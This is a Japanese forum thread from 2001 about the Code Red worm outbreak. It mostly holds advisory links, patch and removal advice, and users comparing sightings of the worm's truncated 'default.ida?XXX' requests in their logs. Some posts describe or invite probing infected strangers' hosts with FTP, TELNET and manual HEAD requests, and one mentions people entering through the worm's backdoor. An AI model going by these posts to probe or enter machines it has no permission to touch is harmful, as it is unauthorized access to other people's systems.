コードレッド (Code Red) 赤丸が世界を覆う

猛威を振るっている Code Red とその亜種 (自称 Code Red II など)
についての情報を追いましょう。
●前スレ　コードレッド (Code Red) 逝ってヨシ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588

(　´Д｀)／　先生! よくわからないけど不安です

1. 使ってるOSは Windows NT4.0/2000ですか？
　　　NT4.0 → 2.
　　　2000 (Server だけじゃなくて Professional 含む) → 3.
　　　どちらでもない → ﾖｶｯﾀﾈ
2. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofnt4
　　を見てすぐに対処しよう
3. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofw2k
　　を見てすぐに対処しよう


(　´Д｀)／　先生! 感染しちゃったみたいです。

すぐに IIS を停止しよう。それから
http://www.microsoft.com/japan/technet/security/codeptch.asp#extermination
を見て駆除しましょう。でも、すでに他のバックドア(裏口)を作られ
ちゃってるかもしれないので、なるべくなら OS の再インストール
を。くれぐれも再インストール中に感染しないように注意。

重要リンク>>2)
そのたの情報>>3
感染の確認>>4-5

IPA による CodeRed II 注意喚起 (日本語)
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
JPCERT/CC による Code Red II 注意喚起 (日本語)
http://www.jpcert.or.jp/at/2001/at010019.txt
CERT Advisory 2001-23 和訳
http://www.reasoning.org/jp/cert/incident_notes/in-2001-09-j.html

マイクロソフト、Code Red対策で24時間電話問い合わせ窓口
http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/msn/137249
MSによる防護策・駆除方法の説明
http://www.microsoft.com/japan/technet/security/codeptch.asp
逝っちゃってるプロバイダ情報
http://watch.impress.co.jp/broadband/news/2001/08/06/codered.htm
hash's Security Alert 2001-02
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
カンコックでは官公庁が感染
http://news.yahoo.co.jp/headlines/reu/010807/int/18345001_japan_47407_1.html
IISから、Apache for win32 にアップグレード （藁 >>3に詳しく
http://www.ring.gr.jp/pub/net/apache/docs/windows.html

Code Red II 情報(英語) : 解析情報へのリンクあり
http://www.incidents.org/react/code_redII.php

Code Red II の警告と解析レポート (英語PDF)
http://aris.securityfocus.com/alerts/codered2/

CodeRed Scanner (英語) : CodeRed 感染の可能性があるホストをスキャン
http://www.eeye.com/html/Research/Tools/codered.html

ヤマハ RT80i, RT50i の脆弱性
http://www.rtpro.yamaha.co.jp/RT/FAQ/TCPIP/www-server-vulnerability.html

古川電工 MUCHO-E シリーズが受ける影響
http://www.humind.or.jp/~higasino/ML/infusers/2001-Aug/msg00003.html

崩壊させられているプロバイダ INTERLINK の障害情報
http://www.interlink.or.jp/notification/backno/2001/trb029.html

東アジア壊滅の図
http://www.security.nl/misc/codered-stats/

Code Red騒ぎでCode Redソーダが絶好調 (日本語)
http://www.zdnet.co.jp/news/0108/04/b_0803_11.html

●IISから、Apache for win32 にアップグレード

ダウンロードはここから
http://www.ring.gr.jp/pub/net/apache/dist/httpd/binaries/win32/apache_1.3.20-win32-no_src-r2.msi
使い方はここをみろ
http://www.ring.gr.jp/pub/net/apache/docs/windows.html

　なんらかの事情がありパッチを当てられない場合には

　http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofothers
　に従い、
　.idq、.idaのidq.dlへのアプリケーションマッピングの削除を行いましょう

　　個人ユーザーで Windows NT/2000 を使っている人も、念のため次の
　　確認をしましょう

　　・Ctrl-Alt-Del を押して「タスク マネージャ」を起動
　　・「プロセス」タブを押す
　　・Inetinfo.exe プロセスを探す

　　Inetinfo.exe があった人は、インデックスサービスの使用有無に
　　*かかわらず* 以下の確認をしましょう

対象商品などのリスト
http://www.microsoft.com/japan/technet/security/codeptch.asp

こっちが本スレなんですか？

おいおい(^^;

こっちの方がまとまってるな。さてどうしたものか。

ここが本スレでいいの？

こっちがほんすれね

こっちで逝こうｙｏ。

>>1 に捧ぐこれまでのあらすじ

ふぇ〜ん、kr.から赤丸ばっかりでいいかげんいやづら･･･
＿＿　 ＿＿＿_＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　 　 ∨　　　 　　ｺｰﾅｯﾀﾗ…
　　　　　　　ｶﾀｶﾀ＿＿＿_　＿＿＿
　　　∧＿∧　　|｜＼　　 .＼　 |◎ |
　　　（；´Д｀）　.|｜　　|￣￣|　 |：[].|
　┌（　　つ／￣l｜ ／￣￣/　 | ＝|
　 |└ ヽ　|二二二」二二二二二二二二」
　　￣］|_＿）_） .|　||　　　　　　　 |　||
　　／￣＼　 ／ . || 　 　　　　／　 ||
　 ◎　　◎..［＿___||　　　 　 .［＿＿||

==================================================

　　　　　　　| 　　　　　　 |　海底ケブール斬ってﾖｼ！
　　　　　　　||l　 ∧Ω∧ υ――――――――――
　　　　　　　 l|ll （´∀｀　） 　ｻﾞｸｰﾘ　　　　<ﾟ彡巛
　　　　　　　 .l|l　ヽ ∨ ノ, 　　　　　　　　　　　　　　<ﾟ彡巛
　＿＿＿＿＿l| (/`'(　) ＼ ＿＿＿＿＿＿＿＿＿＿＿＿＿
ｱNNN…（ﾟ∀ﾟ ){,.,}.A。）ｸﾞﾋｬ!（ ゜∀゜)（゜∀゜)ｱdefault.ida?XXXXX…
￣￣￣￣￣￣　 ￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
==================================================

（次の日）
　　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　|　モナーくん、昨日からカンコック工場と連絡取れないんだ。
　　　　|　悪いが今からこのDVDを届けてきてくれないか。
　　　　＼＿＿＿　 ＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　　　　　∨
　＿＿　　！　　　∧＿∧
/　　／|∧＿∧ （・∀・　 ）
|二|＿_|（；´Д｀） （部長A）
川ﾆl二l一、⊂ ）　|　｜ ｜
￣￣￣￣￣|ノ　（＿（＿_）
　 　 　 　 　 |⊃　　　 　 　　　　／￣￣￣￣＼ 10.255.211.10->80
　 　 　 　 　 | 　　　 　　　　 　/　　　　 ●　　●　　172.30.251.1->80
　　　　　　　　　　　　　　　　　|Y　　Y　　　　　　　＼ 　192.168.3.9->80
　　　　　　　　　　　　　　　　　| |　　 | 　　　　　　▼｜　　127.0.0.1->80
　　　　　　　　　　　　　　　　　| ＼／ 　　 　 　 ＿人| 　ｿﾞﾇｿﾞﾇ…
　　　　　　　　　　　　　　　　　|　　　　　　 ＿＿＿／
　　　　　　　　　　　　　　　　　＼　　　　／
　　　　　　　　　　　　　　　　　　｜ ｜　|
　　　　　　　　　　　　　　　　　　（_＿）＿）

==================================================

（と、いうわけで）
　　　 　 　 ∧ ∧ 　／￣￣￣￣￣￣￣￣￣￣￣￣
〜′ ￣￣( ﾟДﾟ)＜　Code Red 逝ってヨシ！
　 UU￣￣ U U　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿

ではたびたび
おつかれ>>1-4

>>12
おっと。先越された。

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
↑　こちらへどーぞ

混乱を避けるためこちらを本スレにします。以下同名のコードレッド (Code Red) 赤丸が世界を覆う
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
は上げないでください。

>>1
お疲れ様、な、みんないいやつだろ

度々申し訳ありませんでした・・
こっちが本スレという事でいいのかな・・
失敗スレの方は削除依頼に出して参ります・・。

＞＞15
来てますが？

ｿﾞﾇｿﾞﾇ… ってゾヌアラーム？

りょーかい>>16

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

>>1 お疲れさま
>>12 ちと長いがｲｲ!

こんな事態になっても誰も市ねとか言わないあたりが良識人の集まった優良スレを匂わせています。

誤爆すまん！
ここ終了ﾃﾞｼﾀ

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

さてでは改めて質問。
パッチあてたらインデックスサービスはアンインストールする必要はないのですか？

そして今なお巨大化する赤丸赤虫
http://www.security.nl/misc/codered-stats/geodist.gif

ここが本スレ

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

お返事もらった

>日頃ＡＳＡＨＩネットをご利用いただきまして誠にありがとうございます。
>
>お問い合わせの件につきまして、以下にお答えさせていただきます。
>
>ご連絡ありがとうございます。
>ご連絡いただきました情報をもとに調査し、
>該当ユーザーに対してASAHIネット会員規約に基づき対処を
>とりましたことをご連絡いたします。


また、現在、CodeREDウィルス(ワーム)が蔓延しております。
不正アクセスが増加しているのもこのワームが原因と考えられます。

おぃおぃ、こっちが本スレだろ？
>>3の東アジア壊滅の図がないと赤丸の意味がわかんないじゃんかよー

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

>>27
　アンインストールの必要は無いと思われ。
それでも心配なら
http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofothers
　もやっておけば？

　

なー

どっちよ（笑
なんかもう一つは裏を名乗ってるけど

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

夜は厨房多いね。

>>36
こっちが本当、あっちは記念(藁

>>27
アンインストールは必要ないが・・・
必要ないサービスなら止めてしまったほうがよろしいかと。

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

まとまってるし　こっちでいいでしょ
本スレage

明日の朝には勝負が付いてるよ。

>>28
相変わらずエアーズロックの山頂に一匹
ところで警視庁の動きは？
明日の新聞には載るかな
こんな時ぐらい役目をはたせ＞マスコミ

>>39
了解。たしかにこっちのほうがまとまってるし。37 は無視っつーことで。

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

しつこいよ〜

厨房ってアホだね。自分でこのスレのレス伸ばしてるし

>>20
ｿｳﾀﾞYO!

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

>>24
しみじみ語っていいですか…

そうですね、２ｃｈに書き込みしていて、こんな暖かい気持ちになったのは、初め
てです。なぜだか分かりませんが…

きっと、お祭り騒ぎの「…NNNN」、「…XXXX」パケットが、皆さん一人一人の心の
中にまで届いているのではないでしょうか？この未知なる訪問者は、ちょっと季節
はずれかもしれませんがサンタクロースのような存在なのではないでしょうか…

実害を受けたみなさまにはお悔やみ申し上げます。しかし、ネット上でここまで真
剣に「刻々と進化する状況を皆で共有して観察する…」機会というものが、これま
でにあったでしょうか？複雑な気持ちです…

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

しつこいコピペ

ここはおしまい
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
↑　こちらへどーぞ

>>51
同意。今回の事件で「生きているインターネット」を実感したような気がします。

そうだね、地震とか台風のときの妙な連帯感に似たものがあるね。

>>52
　 　　　　　　　 　　　　 　　　／）
　　　 　　　　　　　　　､2)Y⌒ 　⌒フ　　　＋
　　　　　　　　　　　ｯ-i'´ 　　 　 　⌒フ
　　　　　　 　　　 (´ ,.-ﾞー-、 　　　 ろ、
　　　　　　 　＊　シ彡ノ"ﾐVv　　　　）
　　　　 　* 　　　ﾉﾉﾉﾉ"ヽヽヽミ 　　シ　 ／￣￣￣￣￣
. 　 　　　　　　　,l'）∩　 ∩ |)|ヾ　ミ　　＜　ハアハアくん逝ってよし
　 　 　 　 　 　,○）、 ▽　 ﾉjl| YYﾞ　　 　＼＿＿＿＿＿
　 　 　 　 　　 {_∃ ｀l____/⌒'i|
　 　 　 　 　　　￣ Yl"ﾞ⌒lY　|　　＋
　 　 　 　 　 　 　　,ﾄ|＿_/ﾊ　i、
　　　　　　 　　　　,iﾆiﾆiﾆﾕ ﾞh,,）
　　　 　　　　　　 ﾉtYTYヾ＼
　　　 　　　　　　/''フ''''ー<"ヽ、
　 　 　 　 　　　/__ﾉ 　 　　＼ノヽ、
　 　 　 　　　 （＿_）　　　　　ゞ＿_）

(;´д｀)ﾊｧﾊｧ

そんなにコピペしたいんなら
(;´д｀)ﾊｧﾊｧスレに行け

(;´д｀)ﾊｧﾊｧ

(;´д｀)ﾊｧﾊｧ

(;´д｀)ﾊｧﾊｧ

(;´д｀)ﾊｧﾊｧ

荒しは無視。
せっかく最近セキュリティ板治安良くなってきたからね。

赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ
赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ
赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ
赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ
赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ

赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ
赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ
赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ
赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ
赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ 赤玉(;´д｀)ﾊｧﾊｧ

透明あぼ〜んてステキね

裏赤丸スレ（笑）から転載

http://www.security.nl/misc/codered-stats/geodist.gif
↓ その中心は....
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg

しかし、全体的に赤みが増えてるような..気のせいじゃないよね？

どさくさに紛れてＫＲからpingが３発(｀Д´)ﾑｷｰ

昨日（8/7）感染していたサーバーにメールしておいたけど
今日（8/8）もアクセスあるんで見に行ったらIBMのApacheになってたよ。
なんか違う…。

裏に別のサーバーが隠れてるんじゃない？

個人的に、ARP祭りが終わらなくて微妙にうざい

ping3発ぐらい可愛いもんじゃないか許したれよ>>69

8/9　最初のアタックは　61.78.77.170　でした。
とゆうわけで、寝よ。

なんかDIONの感染者多い気がするんだけど、サポートがDQNなので要領を得ない。
あそこはもう終了だな。

>>71
昨日はIISだったから…。

>>76
　うーん....

>>69
俺なんかメール出したらそのドメインからこっちのHP見に来られたっつーの。
普通に見るならまだしも、FTPとかTELNET試してやがる。
晒したろか・・・。

晒してよし。

IPアドレスでHTTP叩いたらいきなりディレクトリインデックス出て、
こっちの方が情けない気持ちになったなぁ。

何のつもりだったんだろう？

>>78
確かにそんなもんは晒してよし

>>78
それあると思う。だからメールしないで様子見てた。
どうせ落ちないし、うざいけど。
だっておれもFTPとかTELNET試したもの。
当然同じこと考えるよね。

＊＊＊＊＊＊＊＊＊
ここまで読んだ

寝る

おやすみ

おつかれ。

なんでコードレッドのアクセスってバ韓国なの…

>>74
こっちは210.130.***.**だった。国内（ｗ

>>86
　君の機械が韓国のそばにあるから。

code red �Vβって何ですか？

http://210.116.223.223/
この中国ページから大量にきてるんですけど
なんとかなりませんかね。

今日一発目のNNNが来た。
ドイツのDeutsche Telekomだと。

>>90
中国じゃなくて韓国みたいですよ。

あのー・・・ここ弐三日ルーターを自動接続にしておくと
勝手にAPに接続してしまってしかも課金されてるんですが
これってCode Redと関係あるんでしょうか。

>>1 不慣れなことお疲れさま。

とりあえず新ネタは無いけど攻撃は収まらず、だな。
まぁマターリといきましょう。

>>78
俺も対応要望メール出したら逆切れしてきたヴァカは
晒したろか（ｗ

>>91
ドイツテレコムもか、、、
http://www.telekom.de/

>>91
お！NNNってまだ生きてたのか！
てっきりXXXに駆逐されたのかと。

NNNだけど、うちには一日に10匹くらいは来てる。

カンコックからのアタックって
default.nida
とかになっているの？

結構URL手打ちだったりして．．．

>>98
ﾜﾗﾀ

もうコードレッドって収まったでしょ。

>>93
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588&st=923&to=923&nofirst=true
　で確認してみたら？

>>101
Nはね

台湾も多いな

今朝早くが最後です>N

>99
今IISログ確認してたら
XXXの後にMSIE5.0の文字が．．．

IP晒したろかｺﾞﾙｧ

うちのとこは0:42に来てる>NNN

>>106
晒してーん

そういえば今日は N 型来てないな〜
繁殖期終わるのいつだっけ？

>>106
ﾜﾗﾀ。晒したい気持ちはわかるが、止めとけ。

>>107
うちは0:43。何故か近いね。

[08/Aug/2001:19:43:40 +0900] 200 digibird.sun-star.co.jp "GET /default.ida?XXX

LOGをよく見たら　こんなところからも　co.jp　は初めてだ。

容疑者ﾊｹｰﾝ >>110

今フランスからXが来た。
ヨーロッパからは初めてだ。

フレッツだとコードレッド全く来ないのかな？
ゾヌ今月一回も警告ないや。

あ、今N来た

夜は赤虫ヲチチャットか（ｗ

>>113
え？オレ何の容疑者？

たまにまざってるねNNN。なんか可愛く感じてしまうのは何故だろう。

フランス、ニュージーランド、オランダからはたまに来てたけど、
今ログ見たらbrってのがあった。もしかしてそのままブラジルか？

>>106
どうゆう意味？手動でバッファオーバーフロー試みてるの？

この中心って日本じゃなくて朝鮮ですよね？

CATVが軒並み逝ってるな・・・・
プライベート配ってるところにどうしてCodeRed侵入してるんだ？
どうしてIISがあるんだ？
実はCodeRedって、目眩ましか？

うちには.it .de .nl .il .mxなんかから来てる。08/07くらいからかな。

>>123
FrontpageExpressが元凶です。Frontpege→IISのM$凶悪コンボ炸裂しちゃってます。

>>122
>>68 参照

つーかなに？
漏れはW2KProだけどIISなんて入ってなかったぞ？
どういう違いだ？

>>127
デフォじゃ入らないが、アプリのインスト時にIISまで入れちゃうソフトがある。
だから無知なくせにブロードバンドで鯖立てちゃったりしてるDQNが感染するってしくみです。

>>127
デフォで入ってないだけ。

>>123
知らんが約款守らずにやってるのかもよ
ルータ禁止なのに使ってるのがいるらしいから
故意にIIS立てちゃってるのがいてもオカシくない

M$は24時間態勢を敷いたとか
警視庁はサーバ管理者に連絡とってるとか
まさにシステム管理者の眠れない夜だな。
さて、寝るか。

>>128
なんでWindows Updateに入れてないんだ？
sadmindやCode Red Iのときに・・・

まあ、鯖立ててるって気がつかなきゃ対策もしないよなあ。

IP addressの最初のバイトが違うとこから来る赤丸君はなんだか当たりくじみたい。
ランダムにIPを選ぶ確率が1/8でさらにそこから選ばれるってのは結構な確率でしょう。
まあ、それだけ感染したサーバが多いって事でしょうか。

>>130
たしかーに。しかしまっったく、警察なんか出なくても、プロバが自分でやれ！！て感じかな？
さて、俺もねるか。

ていうことは、自分でCodeRedばらまきながらプロバイダに「遅せーぞ！どうなってんだｺﾞﾗｧ！」
って息巻いてる奴が居るって事だな。鬱だ。

そいえば自分のとこにJCOM関西から来たのがあったな・・・

暇なんでメール連絡の結果、ガックシした例：
教育機関、某大学系、whoisで調べた技術管理者アドレスは大抵エラーで返送される。
それならばとサイトにお邪魔しホームページのリンクからinfo@ だの、webmaster@だのと出すも大抵管理者は使ってないアドレスで一向に読んでる風じゃない。
情報教育機関って結構いい加減なのがよくわかった。

某ニュースグループ
NT、2000系は今頃になってログに変なのがと慌てるバカがいる、フォローの内容もちょっと遅れているし、言うことが変。自分もIISとApache両方使う立場だが、恥ずかしくなってくるようなユーザーが多い。

>>135
とりあえずアタックしてきた奴の胴元プロバに片っ端から電話してるのだっが対応が様様で笑える。
コードレッドというのはソフトの名前でしょうか？
なんてほのぼのしたところから
私どもは莫大なユーザーに利用していただいておりますのでお客様個別に連絡するということはできません。
なんて放任主義から
担当者に代わってログを送ってくれなんてできたところまで。
次回プロバ乗り換えの際の参考になった。

>>137
２ｃｈが一番情報早くて一番役に立ったよ。
バックドアから侵入して喜んでるお馬鹿さんもいたみたいだけど。

うちに来たJ-COMなのに感染野郎は、現在63人。
ARP台風止まりませーん！

ARP台風って何ですか？

結局2chは、今回４日夜からのリアルタイム中継とｲｳｺﾄﾃﾞ
どこよりも情報速かったよ。一日遅れで気づいてたらやられてた
IISって結構いるとおもうぜ。助かったヤツ、感謝しろyo。

今のところ10ヶ国からアクセスがありました。

日本、韓国、台湾、アルゼンチン、タイ、アメリカ、オーストラリア
カナダ、ドイツ、ノルウェー

しかし疑問なのがred codeと同時にnetbios名をとりにくるやつだな。
なんなんだろう？

>>141
さっきよりちょっとましになって、平均で秒間25発のARP。
まあ別にいいんだけどさ

>>144
漏れもなにかと思ってたけど、netbios名取りに来る奴は
必ずホストネームが無いよ。　何か関係ある？

>>144
ファイヤーウォールの侵入者身元割り出し機能では？

ARP？それCodeRedと関係ないのでは？

旧に止んだんだけど、テレホ夏厨が寝たからでしょうか？
ダイヤルアップで感染しちゃうなんて運がないというかご愁傷様です。

>>147
BlackICEについてるね。
自分は防御してるから、クエリに反応しない。

>>144
>>147>>150
それ、あんた感染してないか？（ｗ

>>151
いや、入れてないしIIS(藁

>>144
@niftyだけど、うちにはないな。
月曜の昼、UDPで高いポート番号のアクセスが数種類(裏口仕込み・起動→アクセス?)
があったけど。

>>151
　そいつは確認済みだぜ、べいべー

>>123
http://www.keepoint.com/
十Ｑの場合こんな所がＣＡＴＶと専用線の両方にIIS鯖立ててるから内部に流れてしまうのさ。
実際ここからのアタックは流行り始めてから現在までアタック数第一位。

>>153
　うちも実はニフティ。で、今調べたら相手は佐賀からフレッツISDNで
　ニフティ（笑）なんなんだろうなあ。

Ｘを送ってきたやつのアドレスアクセスしてたらこれが出てきたけどなんで？
歡迎使用 Microsoft(R) Personal Web Server 4.0
此首頁是置於 Microsoft Personal Web Server (PWS) 4.0 上。PWS 會將執行 Windows(R) 95 或 Windows 98 的任何電腦轉換成 Web 伺服

>>155
そんなところがまだ立ったまま？

>>156
国内は対策が進んで、夕方からの個人ユーザPPP再感染ヤローとしか
思えない同一プロバのがほとんど。
それよか、@niftyつうかppp.infoweb.〜が多いと他プロバの人の愚痴けっこう聞くが。

>>157
head送ってみなよ。そしたら本当のサーバーがわかるから。

皆さん何で検知してますか？
うちは黒氷です。

>>161
Win: 黒氷
FreeBSD: ppp内蔵パケットフィルタ・・・するとつまんないんでわざわざapacheで観測(藁

Apacheのログでみてる．
俺Plalaなんだが，俺のトコには202.〜が圧倒的に多い
ただ，数はそんなに多くないな．1時間当たり10-20発くらい．

>>159
うちはdionとめたりっくがトップ。

メインはperlスクリプト。4日のX出始めの頃はPacMonProとか
Vigilでダンプ取って調べたりしたけど。そういやSygateも動いてるな

>>163
うちもぷららのフレッツだけどで同じぐらいです。
アドレスは自分と同じ210ばっかし

送ったけどなにもかえってこない。
送り方がわるいのかなあ
漏れレベルではちょっと無理という事か

>>158
十Ｑから逝っになって障害報告がなかなか出なくなった。
会社ぐるみで感染してる当の相手も淫土人なんで逆ギレされても何逝ってるかわかんないだろうし。

いまさらながら第一オクテット、または第一＋第二オクテットが同じところに感染を
試みるっていう仕様どおりだね→Xちゃん

>>167
HEADメソッドにレベルも何もないでしょ（ｗ
ただ単に回線いっぱいなんじゃないの？

>>167
telnet 相手のアドレス 80
まじめにリクエスト鬱の面倒。リターンキー適当にうつ
リクエストエラーだけど、HTTPヘッダでバージョンわかるよ。

HEAD / HTTP/1.0[Ctrl+J][Ctrl+M]

HEAD / HTTP/1.0[Ctrl+J][Enter]
じゃないとだめかも

>>173
仕様ではCR+LFなので、逆では。

CRLFを二つ付ければ問題無いだろ

あぁ　それで良いのか。。漏れ毎回わざわざ改行コード変えてたよ

そか、ごめん。

もうつながらなくなっちゃった
先までは80番でESTABになったのに。
パーソナルＷＥＢサーバーの後ろからマスカレードで
赤虫が来てるって事？
>>157

DTIからのアクセスがやむ気配なし。
プロバイダはメールなりでちゃんと告知してんのかな？

何も考えずEnter 2回でいけないか？

プロバイダにｺﾞﾙｧメール入れたいんだけど
文面どう書けばいいんだろう？

そうか、漏れリターンキーしか押さなかった。
勉強になります

>>180
ターミナルの設定によるけど、それで大体OKだね

>>181
ｺﾞﾙｧ

100件のうちport111に一件あるだけで他は全てport80って・・
ｲﾝﾎﾟｳｪﾌﾞが多いよ・・

>>182
2度押した？

>>185
旧infoweb=@nifty 迷惑との情報よく効く (漏れ 旧infoweb (汗

>>186他
いろいろありがとうございます解決しました。
TeraTermだとだめだけどWIN2K純正のやつだったら
できた。でも問題のアドレスは死んじゃったみたいで
元の疑問は闇の中へ・・・

“Code Red” って語源は何?

>>188
TeraTermのデフォルトの改行コードはCRだけだったかな？
CRLFにしてみれ

テレホ連中からのCodeRedアタック、昨日の晩のペース
とちっとも変わらんな。

こりゃホントに収まるのか？

>>187
つか私もCATV@niftyだったり・・
同じ中で走査されてんのかね

>>189 これ見れ
http://www.zdnet.co.jp/news/0108/04/b_0803_11.html

>>192
漏れはFlets ADSL
さっきも述べたけど第一オクテット、第一＋第二オクテットが同じところに中心的にばら撒くのは
今回の仕様。

なんか中華方面からクレームがきて作ったような話だと
思わないこれ。
もし漏れが見つけたら「午後の紅茶」って名前になってた
ってことかい？

>>193
おお、ありがと。胸のつかえがおりたよ。
もう思い残すことは無い。

>>191
プロバイダがユーザ任せで、ご家庭ユーザを制御できてないと思われ。
ただ、今回のは期限付きらしいので、10月の頭だか、終りだかに活動停止
＝メモリ常駐ワームで24 or 48時間ごとリセットなので実質、終了。

誰か変種作っちゃうと・・・・

もう、こういうもんだと思って使いつづけるか、法制度で強制力持たせないと
どうにもならないね。

>>195
すると俺が見つけたら「JAVA TEA」になってたわけだが、
各所から文句出そうだな(w

次に見つけるときはドクターペッパーをのんでいて欲しい。

ブラックジンジャーもいいな

>>194
自分のプロバの対応能力がわかるということか
件数が多い人の入ってるプロバほど糞と・・
>>193
なんかペプシまで憎くなってきたよ

ブラックジンジャーだろう
　↓
(ﾟдﾟ) ｳﾏｰ!!

じゃあ缶のしるこ飲みながらウィルス探しに没頭するかな

ネオむぎ茶ってどうよ (ﾌﾟ

>>197
リブート後バックドア全開のまま再感染してＩＰ知らせて回っているのもいるぞ。

>>197
「一般用はプロバイダ側でフィルタリングして一方通行にする事」なんてね
つまんない世の中になりそうだな。
せめて情報公開は免許制にして、無線でゆうアマ免許みたいなのを作って
ほしいな。

昔にあった「ゴメンね･･･」とかいう炭酸飲料はどうだ？
申し訳なさそうなウィルスで悪い気はしないかも

変種が出ることは間違いないだろうから、期限付でもまったく楽観できないよなぁ。
このパケットが流れ続けるのが常態化しそう。

別に飲み物じゃなくても、「ぺヤング食べてました」でもいいじゃん

インターネット全体の慢性的な低速化ですか。

>>206
　そして、その免許認定機関には郵政省の天下りが...
　って今は郵政省じゃないんだっけ？

>>206
免許、認可制度はアレなので、簡単な手続きで損害賠償ができるようにする。
諸刃の剣かも・・・

適当な管理してた管理者だけ罰する法律作ってくれ

新ウイルス、その名も吉牛（笑）

>>212
たとえば、プロバとＭＳは、上限つきでいいから一定の責任をとれということで。

「ソフトに未チェックのバッファがあったら死刑」

これでいいよ

>>216
殆どの開発者が死刑だ。

>>217
うん、俺も死刑になるね（ｗ

すまん、俺も死刑かもしれん。

つーか死刑はともかく、明日の仕事がきつくなるだけ
だからもう寝るよ。とりあえず執行猶予をくれ（ｗ

では、今晩はＤＱＮ侵入君が現れないことを祈って夢路につこう・・・

　　感染シテルやつ　みつけたら　どう遊んでやるんだ？
　　&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

詳しく教えてくれ。

そんじゃ、俺も寝る。おやすみ。

>>204
２ちゃんでギコネコをコピペしたやつに感染するとか （ｗ

遅ればせながらスレ立てお疲れさん．>>1

http://www.security.nl/misc/codered-stats/geodist-rcv2.gif
を見ると、Code Red II のみに関してはヨーロッパにその被害
が集中しているように見えるけど、なぜなんだろう。
単なる誤爆なんだろうか・・・

>>225
(1)第一Octetが同じ、または第一・第二Octetが同じところに重点的に感染するから。
(2)さらに、観測点がオランダだから。

>>226
なるほど。要は観測点の問題ですね。
Code Red II の仕様からすると、中国語版OSを使っている可能性
が高い地域をターゲットにするのでは？と思っていたのです。

全く来なくなったからCATV局側で対策取ったのかと思ったら単にport80塞がれただけだった。
自鯖に外からアクセスできねぇ…。
仕方無いので81で立ち上げ直した。
しょせんCATVか。

インフォスフィアなんだけど、3:15頃からパッタリ止んだ。

カンコックでは官公庁が感染
http://news.yahoo.co.jp/headlines/reu/010807/int/18345001_japan_47407_1.html

激しくwarata
すげーよ。

>>230 の記事
> また、ソウルの官庁間ネットワークのセキュリティーを強化したという。

ま、セキュリティーを強化したなんてことはいうのは簡単だわな。
ネットワークに接続しないでスタンドアロンで使う分には、誰にも
迷惑かけないんだからさ〜、そうしとけって。

つーか日本の場合はCodeRedすら見向きもされないほど遅れていると思われ

ところで　感染した側には、こちらのdefault.idaが渡るのかな？

逝ってヨシのAAを入れたおいたのですが。
アパッチサーバーは、"GET　def..." 200 をLOGに残しています。

BlackIce + Apacheで監視してます。
CodeRed来ると、ずっとエラーコードが404だったのに
なんか突然200返した。なぜ？
BlackIceで赤ビックリついたのでかなりビビッタのですが。

>>233
ブー。スレ内1〜4にあるSecurity Focusのレポートに詳しいですから読みましょう。

>>233
すまん、意図を取り違えた。
自分の用意した/default.idaは、「アクセスしてきた感染サーバ」への応答に
わたるかもしれんが、当然、誰も読まない(藁

未来を指してしまった。鬱出し脳・・・

NHKでちょっとやってた＞コード・レッド

漏れも見た、感染した会社は不正アクセス防止法に引っかかるって言ってたね。

>239
> 感染した会社は不正アクセス防止法に引っかかるって言ってたね。

マジで？それはなんか違うような・・・
それを言ったら、今回の CodeRed に限らず、今までにあったワームや
